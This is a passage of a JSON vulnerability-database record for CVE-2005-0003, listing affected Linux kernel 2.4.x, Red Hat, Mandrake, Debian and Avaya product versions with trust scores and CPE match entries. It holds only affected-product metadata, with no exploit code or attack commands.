        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "converged communications server",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "s8710",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.23_ow2"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "s8710",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "network routing",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "mn100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "intuity audix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.24_ow1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.1"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "s8710 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8710 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "network routing",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "mn100",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "intuity lx",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8710:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:converged_communications_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:mn100:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:network_routing:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8710:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:intuity_audix:*:*:lx:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
